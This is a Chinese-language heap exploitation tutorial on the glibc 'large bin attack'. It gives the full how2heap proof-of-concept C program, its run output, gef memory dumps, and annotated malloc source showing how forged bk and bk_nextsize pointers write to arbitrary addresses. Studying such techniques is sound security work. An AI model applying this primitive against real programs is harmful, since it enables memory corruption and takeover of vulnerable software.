3.1.9 Linux 堆利用(四)
how2heap
large_bin_attack
#include<stdio.h>
#include<stdlib.h>
int main() {
unsigned long stack_var1 = 0;
unsigned long stack_var2 = 0;
fprintf(stderr, "The targets we want to rewrite on stack:\n");
fprintf(stderr, "stack_var1 (%p): %ld\n", &stack_var1, stack_var1);
fprintf(stderr, "stack_var2 (%p): %ld\n\n", &stack_var2, stack_var2);
unsigned long *p1 = malloc(0x100);
fprintf(stderr, "Now, we allocate the first chunk: %p\n", p1 - 2);
malloc(0x10);
unsigned long *p2 = malloc(0x400);
fprintf(stderr, "Then, we allocate the second chunk(large chunk): %p\n", p2 - 2);
malloc(0x10);
unsigned long *p3 = malloc(0x400);
fprintf(stderr, "Finally, we allocate the third chunk(large chunk): %p\n\n", p3 - 2);
malloc(0x10);
// deal with tcache - libc-2.26
// int *a[10], *b[10], i;
// for (i = 0; i < 7; i++) {
// a[i] = malloc(0x100);
// b[i] = malloc(0x400);
// }
// for (i = 0; i < 7; i++) {
// free(a[i]);
// free(b[i]);
// }
free(p1);
free(p2);
fprintf(stderr, "Now, We free the first and the second chunks now and they will be inserted in the unsorted bin\n");
malloc(0x30);
fprintf(stderr, "Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist\n\n");
p2[-1] = 0x3f1;
p2[0] = 0;
p2[2] = 0;
p2[1] = (unsigned long)(&stack_var1 - 2);
p2[3] = (unsigned long)(&stack_var2 - 4);
fprintf(stderr, "Now we use a vulnerability to overwrite the freed second chunk\n\n");
free(p3);
malloc(0x30);
fprintf(stderr, "Finally, we free the third chunk and malloc again, targets should have already been rewritten:\n");
fprintf(stderr, "stack_var1 (%p): %p\n", &stack_var1, (void *)stack_var1);
fprintf(stderr, "stack_var2 (%p): %p\n", &stack_var2, (void *)stack_var2);
}
$ gcc -g large_bin_attack.c
$ ./a.out
The targets we want to rewrite on stack:
stack_var1 (0x7fffffffdeb0): 0
stack_var2 (0x7fffffffdeb8): 0
Now, we allocate the first chunk: 0x555555757000
Then, we allocate the second chunk(large chunk): 0x555555757130
Finally, we allocate the third chunk(large chunk): 0x555555757560
Now, We free the first and the second chunks now and they will be inserted in the unsorted bin
Then, we allocate a chunk and the freed second chunk will be moved into large bin freelist
Now we use a vulnerability to overwrite the freed second chunk
Finally, we free the third chunk and malloc again, targets should have already been rewritten:
stack_var1 (0x7fffffffdeb0): 0x555555757560
stack_var2 (0x7fffffffdeb8): 0x555555757560
该技术可用于修改任意地址的值,例如栈上的变量 stack_var1 和 stack_var2。在实践中常常作为其他漏洞利用的前奏,例如在 fastbin attack 中用于修改全局变量 global_max_fast 为一个很大的值。
首先我们分配 chunk p1, p2 和 p3,并且在它们之间插入其他的 chunk 以防止在释放时被合并。此时的内存布局如下:
gef➤ x/2gx &stack_var1
0x7fffffffde70: 0x0000000000000000 0x0000000000000000
gef➤ x/4gx p1-2
0x555555757000: 0x0000000000000000 0x0000000000000111 <-- p1
0x555555757010: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p2-6
0x555555757110: 0x0000000000000000 0x0000000000000021
0x555555757120: 0x0000000000000000 0x0000000000000000
0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2
0x555555757140: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p3-6
0x555555757540: 0x0000000000000000 0x0000000000000021
0x555555757550: 0x0000000000000000 0x0000000000000000
0x555555757560: 0x0000000000000000 0x0000000000000411 <-- p3
0x555555757570: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p3+(0x410/8)-2
0x555555757970: 0x0000000000000000 0x0000000000000021
0x555555757980: 0x0000000000000000 0x0000000000000000
0x555555757990: 0x0000000000000000 0x0000000000020671 <-- top
0x5555557579a0: 0x0000000000000000 0x0000000000000000
然后依次释放掉 p1 和 p2,这两个 free chunk 将被放入 unsorted bin:
gef➤ x/8gx p1-2
0x555555757000: 0x0000000000000000 0x0000000000000111 <-- p1 [be freed]
0x555555757010: 0x00007ffff7dd3b78 0x0000555555757130
0x555555757020: 0x0000000000000000 0x0000000000000000
0x555555757030: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2 [be freed]
0x555555757140: 0x0000555555757000 0x00007ffff7dd3b78
0x555555757150: 0x0000000000000000 0x0000000000000000
0x555555757160: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x555555757130, bk=0x555555757000
→ Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE) → Chunk(addr=0x555555757010, size=0x110, flags=PREV_INUSE)
[+] Found 2 chunks in unsorted bin.
接下来随便 malloc 一个 chunk,则 p1 被切分为两块,一块作为分配的 chunk 返回,剩下的一块继续留在 unsorted bin(p1 的作用就在这里,如果没有 p1,那么切分的将是 p2)。而 p2 则被整理回对应的 large bin 链表中:
gef➤ x/14gx p1-2
0x555555757000: 0x0000000000000000 0x0000000000000041 <-- p1-1
0x555555757010: 0x00007ffff7dd3c78 0x00007ffff7dd3c78
0x555555757020: 0x0000000000000000 0x0000000000000000
0x555555757030: 0x0000000000000000 0x0000000000000000
0x555555757040: 0x0000000000000000 0x00000000000000d1 <-- p1-2 [be freed]
0x555555757050: 0x00007ffff7dd3b78 0x00007ffff7dd3b78 <-- fd, bk
0x555555757060: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x0000000000000411 <-- p2 [be freed]
0x555555757140: 0x00007ffff7dd3f68 0x00007ffff7dd3f68 <-- fd, bk
0x555555757150: 0x0000555555757130 0x0000555555757130 <-- fd_nextsize, bk_nextsize
0x555555757160: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x555555757040, bk=0x555555757040
→ Chunk(addr=0x555555757050, size=0xd0, flags=PREV_INUSE)
[+] Found 1 chunks in unsorted bin.
gef➤ heap bins large
[ Large Bins for arena 'main_arena' ]
[+] large_bins[63]: fw=0x555555757130, bk=0x555555757130
→ Chunk(addr=0x555555757140, size=0x410, flags=PREV_INUSE)
[+] Found 1 chunks in 1 large non-empty bins.
整理的过程如下所示,需要注意的是 large bins 中 chunk 按 fd 指针的顺序从大到小排列,如果大小相同则按照最近使用顺序排列:
/* place chunk in bin */
if (in_smallbin_range (size))
{
[ ... ]
}
else
{
victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;
/* maintain large bins in sorted order */
if (fwd != bck)
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert ((bck->bk->size & NON_MAIN_ARENA) == 0);
if ((unsigned long) (size) < (unsigned long) (bck->bk->size))
{
[ ... ]
}
else
{
assert ((fwd->size & NON_MAIN_ARENA) == 0);
while ((unsigned long) size < fwd->size)
{
[ ... ]
}
if ((unsigned long) size == (unsigned long) fwd->size)
[ ... ]
else
{
victim->fd_nextsize = fwd;
victim->bk_nextsize = fwd->bk_nextsize;
fwd->bk_nextsize = victim;
victim->bk_nextsize->fd_nextsize = victim;
}
bck = fwd->bk;
}
}
else
[ ... ]
}
mark_bin (av, victim_index);
victim->bk = bck;
victim->fd = fwd;
fwd->bk = victim;
bck->fd = victim;
假设我们有一个漏洞,可以对 large bin 里的 chunk p2 进行修改,结合上面的整理过程,我们伪造 p2 如下:
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x00000000000003f1 <-- fake p2 [be freed]
0x555555757140: 0x0000000000000000 0x00007fffffffde60 <-- bk
0x555555757150: 0x0000000000000000 0x00007fffffffde58 <-- bk_nextsize
0x555555757160: 0x0000000000000000 0x0000000000000000
同样的,释放 p3,将其放入 unsorted bin,紧接着进行 malloc 操作,将 p3 整理回 large bin,这个过程中判断条件 (unsigned long) (size) < (unsigned long) (bck->bk->size)
为假,程序将进入 else 分支,其中 fwd
是 fake p2,victim
是 p3,接着 bck
被赋值为 (&stack_var1 - 2)。
在 p3 被放回 large bin 并排序的过程中,我们位于栈上的两个变量也被修改成了 victim
,对应的语句分别是 bck->fd = victim;
和 ictim->bk_nextsize->fd_nextsize = victim;
。
gef➤ x/2gx &stack_var1
0x7fffffffde70: 0x0000555555757560 0x0000555555757560
gef➤ x/8gx p2-2
0x555555757130: 0x0000000000000000 0x00000000000003f1
0x555555757140: 0x0000000000000000 0x0000555555757560
0x555555757150: 0x0000000000000000 0x0000555555757560
0x555555757160: 0x0000000000000000 0x0000000000000000
gef➤ x/8gx p3-2
0x555555757560: 0x0000000000000000 0x0000000000000411
0x555555757570: 0x0000555555757130 0x00007fffffffde60
0x555555757580: 0x0000555555757130 0x00007fffffffde58
0x555555757590: 0x0000000000000000 0x0000000000000000
考虑 libc-2.26 上的情况,还是一样的,处理好 tchache 就可以了,在 free 之前把两种大小的 tcache bin 都占满。